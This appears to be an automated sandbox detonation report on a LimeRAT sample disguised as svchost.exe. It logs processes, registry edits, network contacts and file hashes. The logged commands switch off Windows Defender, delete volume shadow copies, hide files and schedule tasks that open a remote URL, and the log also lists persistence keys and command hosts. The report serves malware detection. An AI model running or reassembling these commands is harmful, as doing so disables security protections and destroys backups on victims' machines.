PID 2324 wrote to memory of 5012 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 4992 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 4992 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 4036 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 4036 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 1700 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 1700 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 3856 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 3856 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 1876 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 2324 wrote to memory of 1876 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 2324 wrote to memory of 4164 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 2324 wrote to memory of 4164 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 2324 wrote to memory of 3216 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 2324 wrote to memory of 3216 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 2324 wrote to memory of 3440 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 2324 wrote to memory of 3440 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 2324 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 2324 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 2324 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 2324 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 2324 wrote to memory of 3044 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 2324 wrote to memory of 3044 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 2324 wrote to memory of 4576 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 2324 wrote to memory of 4576 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 2324 wrote to memory of 2056 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 2324 wrote to memory of 2056 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 2324 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 2324 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 2324 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 2324 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 2324 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 2324 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 2324 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 2324 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 3440 wrote to memory of 4132 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3440 wrote to memory of 4132 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1988 wrote to memory of 4972 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1988 wrote to memory of 4972 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4576 wrote to memory of 1396 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4576 wrote to memory of 1396 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe

System policy modification

evasion
Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Run C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Run\svchost.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Branding\\svchost.exe" C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Run\svchost.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Branding\\svchost.exe" C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd /c attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding" & attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D

C:\Windows\system32\attrib.exe

attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding"

C:\Windows\system32\attrib.exe

attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" Get-MpPreference -verbose

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin Delete Shadows /all /quiet

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadow /for=c: /on=c: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c Vssadmin delete shadowstorage /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

Vssadmin delete shadowstorage /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadow /for=c: /on=c: /maxsize=401MB

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "06:49" /sc daily /mo "5" /tn "EnableLicenseAcquisition" /tr "'explorer'https://gsurl.be/kXFY"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "01:25" /sc daily /mo "3" /tn "EnableLicenseAcquisition" /tr "'explorer'https://gsurl.be/kXFY"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "07:56" /sc daily /mo "3" /tn "EnableLicenseAcquisition" /tr "'explorer'https://gsurl.be/kXFY"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "23:09" /sc weekly /mo "4" /d "Mon" /tn "EnableLicenseAcquisition" /tr "'explorer'https://gsurl.be/kXFY"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "08:19" /sc monthly /m " jul" /tn "EnableLicenseAcquisition" /tr "'explorer'https://gsurl.be/kXFY"

C:\Users\Admin\AppData\Roaming\Branding\svchost.exe

"C:\Users\Admin\AppData\Roaming\Branding\svchost.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd /c attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding" & attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D

C:\Windows\system32\attrib.exe

attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding"

C:\Windows\system32\attrib.exe

attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

Network

Country Destination Domain Proto
US 8.8.8.8:53 iplogger.org udp
US 104.21.4.208:443 iplogger.org tcp
US 8.8.8.8:53 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa udp
US 8.8.8.8:53 ftp.encompossoftware.com udp
US 8.8.8.8:53 208.4.21.104.in-addr.arpa udp
US 64.40.144.30:21 ftp.encompossoftware.com tcp
US 8.8.8.8:53 30.144.40.64.in-addr.arpa udp
US 64.40.144.30:43294 ftp.encompossoftware.com tcp
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 www.example.com udp
US 93.184.215.14:443 www.example.com tcp
US 8.8.8.8:53 14.215.184.93.in-addr.arpa udp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 104.20.3.235:443 pastebin.com tcp
US 147.185.221.16:59320 tcp
US 8.8.8.8:53 235.3.20.104.in-addr.arpa udp
US 8.8.8.8:53 16.221.185.147.in-addr.arpa udp
US 8.8.8.8:53 208.143.182.52.in-addr.arpa udp

Files

memory/2324-0-0x0000021B31B70000-0x0000021B31BB2000-memory.dmp

memory/2324-1-0x00007FFF7A123000-0x00007FFF7A124000-memory.dmp

memory/2324-2-0x00007FFF7A120000-0x00007FFF7AB0C000-memory.dmp

memory/5016-7-0x00007FFF7A120000-0x00007FFF7AB0C000-memory.dmp

memory/5016-8-0x00007FFF7A120000-0x00007FFF7AB0C000-memory.dmp

memory/5016-11-0x00007FFF7A120000-0x00007FFF7AB0C000-memory.dmp

memory/5016-9-0x000001C2D4DB0000-0x000001C2D4DD2000-memory.dmp

memory/5016-14-0x000001C2D59C0000-0x000001C2D5A36000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_c04c0cci.e4n.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/5016-43-0x00007FFF7A120000-0x00007FFF7AB0C000-memory.dmp

memory/5016-51-0x00007FFF7A120000-0x00007FFF7AB0C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 ad5cd538ca58cb28ede39c108acb5785
SHA1 1ae910026f3dbe90ed025e9e96ead2b5399be877
SHA256 c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
SHA512 c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 326682587fa2a91cdce1a23343365924
SHA1 f3f9c4c753185c9ad8e65bbf3d3c027082b4ed5c
SHA256 c26a1262354d3eb74dc6da10db49ddcada09cf606f90f1ece7dba3332d090e20
SHA512 c6835c9e8de2676b92583cb7e96d3b64680f3e810d2b6dd7ce240b8c16c7c1060fd37a31df9f0afb8eed95dc7395a8c474f522407b77fd40aa15956b694c9f4c

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c176893209cde8007a0f5725480f95a2
SHA1 8c2af7640abb79e5f29af46f7ff5b57cb99a9d24
SHA256 36d94401b3d02935ed756b287003dbeb246dd6de6bb5f7075dbb2719f78efe6a
SHA512 5dfcd2f66add6fd2da9af9d2d2b91c1288d5428afc26d59405f930cbacf90c2a30ae68b9fe30237cf1b337903b911916cab7c2815437931c0b39061bc1192049

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4be28fdfb37a676b93fad78b99d81211
SHA1 332072f199bce181ba74730b7d4d1072d2b0af19
SHA256 9e66684d79d4992d4fe387a5e3970545182a0ca52ecbf1b69cfbb537f5cedfa6
SHA512 69284ab872572813ff614b3c1fcf8738f14453b20066d91ed48b3051a406272031c2f5f6d70684480af746b07e7df1e113569ff21a17993bd9c577c2868198a3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1251c52bf27855e59b1a121961ca2ab6
SHA1 9398fba66b322fd3ca99d6ad9476a06a46f92c41
SHA256 23f9fc9342bf8c5f567439b05b22533c15b8839e12612ecf782b42ad2b8f1c70
SHA512 cdd3a8fcd712893205efe86e7a30be64d37d7e04923a3a6042d87f4b0251a913bd77cdd7a729aaeece3050a7e7e88e275bb206f317cfabf02ad6409077016e63

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 42f854a16123a7207968a3690f6a3db7
SHA1 9bf2f4a63aeff9365f5a69cee28dfe769fd19bb4
SHA256 cdf414ceb304061e82bf6e0d70807a99307bc102851399e253850c0104b31e69
SHA512 558d194a5669a5df8f4ac6aadb36047c800ff773c4aa8bda107e268d4b58e261a703ad2a55e18acc8ba01de3391bd626b42fe794494aeb4ce03023f0a98d1bf4

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 19c0976b6fb0de0eaa9c9e7b473064e1
SHA1 396be14e8cee53e7a631fc6dcda3aa2ec9b1b281
SHA256 b7ae4d869a394726856b59f24f2df0e643f9e0675ed89266ca9f881f1e21e17c
SHA512 889a95789d27cdb3bb706f54e7d19380e331fbaf2816f7d337a47b59017f63eabef515209993ffcfd199dd4d3c7221a24d67dd52da776a8bd542715c73c9e0c4

memory/2324-544-0x00007FFF7A123000-0x00007FFF7A124000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2067ae57626e36223689ffecaba3b327
SHA1 0b2324ac98f9ede4932e3f8f560e03d4d1a1c8d7
SHA256 df7b47c1b102b6b5b0d020c46f45da8e9c595e9032d7d1cb4afd8bd7f61f4b19
SHA512 02f4894da5136eb13a18928d0502b9a98e3f2d7fc08434c302695d68da0a091c4b33d54ea4b091623ab5868bcfb9a5c5254ec3bade50bb445ac4e09fc7ad5a00

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e41c231d56e1281192f5209de73222c5
SHA1 59f24fafe8d7555a53a42cfab048477153148eb5
SHA256 27da3e64fae9b82755a2c2f147bc5c25803540c8d744acf6e4ea45f315305da8
SHA512 2d37ef379bc0651ab65ac10a65da7805f26657f66e700ea569c59d583c6c5a55f9cc09b4f763e8d3cc288cd4ec2ce42ea12ccc7cbeb01cf64ad5cb87eb846a9f

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 80bd89f3610176124e7363c4f0729015
SHA1 9b045d173660cf2ffff206eed7e6acc69e4b8357
SHA256 73b6ab0315f2dae879f62688b02aa4f76794f57bfb431e4f833fff4cf89264e6
SHA512 0db85b745f6c23c9432053f8a0833994df0b44bda3a1721667caeb817bceccfaf4692eed9272ad69aaa2d4de12400aef3de98eb4bcf0d462e20f5868b22d39ac

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f775aa93e7cb45bcdb8003aac41437d3
SHA1 1bb3c21d107d0f5902315f83616e94931620309c
SHA256 3abbe7cf798db495b11bcbabd8242a234bbf278cb46d44344d03352c85f3e34b
SHA512 1f2b388e1fa2accb9cb033803b45ddee21ab1cdf5198d05721b9916bc885af1feed59b7f9062860644388df99cbcc82d092a1f6efeb7534b309fb7639238e226

memory/2324-559-0x00007FFF7A120000-0x00007FFF7AB0C000-memory.dmp

C:\Users\Admin\AppData\Roaming\Branding\svchost.exe

MD5 05e991bcf019b487f7ad4e896c77e988
SHA1 f4a93e4ce16dba10cdc835fe1ae71da3dd88f73a
SHA256 cb87011623c7e41c0a449814e76c887543e6e39e6ab3864c7cc3636dcf09e196
SHA512 4f4ee0153af79dbb6352b1382cbee3b5af72c64f827450d2a681fd2b3177304ac1c6626c055159facb84aca9f8ba6aa9d1265d5fb148080e566903949081cfb3

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost.exe.log

MD5 a9d9426944d7ee7cff4018213e207474
SHA1 e6a45f343e5181a5d44eccd5abd0a5e0d559ee29
SHA256 9d1fd0305bd35ac934cbcbfb7ded29505a255f77306994676d0b994e51dcdacb
SHA512 f3c4e6993baa914ef7fd0d93d8a4d82cf4b63df807634f810fd307d77341ffde80b0671c20fa0f84107aaf1ee00634488b877e200fcc1e66317bc05c9bc077a2

memory/2324-566-0x00007FFF7A120000-0x00007FFF7AB0C000-memory.dmp

memory/2968-574-0x00000211566B0000-0x00000211566CE000-memory.dmp

memory/2968-575-0x0000021172130000-0x0000021172656000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-19 22:02

Reported

2024-06-19 22:06

Platform

win10v2004-20240611-en

Max time kernel

190s

Max time network

169s

Command Line

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

Signatures

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

LimeRAT

rat limerat

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4" C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A

Modifies visibility of file extensions in Explorer

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A

Modifies visibility of hidden/system files in Explorer

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A

Deletes shadow copies

ransomware defense_evasion impact execution

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\E: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\g: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\D: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\h: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\h: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\e: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\e: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\g: C:\Windows\system32\vssadmin.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Hide Artifacts: Hidden Files and Directories

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\cmd.exe N/A
N/A N/A C:\Windows\SYSTEM32\cmd.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A

Disables Windows logging functionality

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
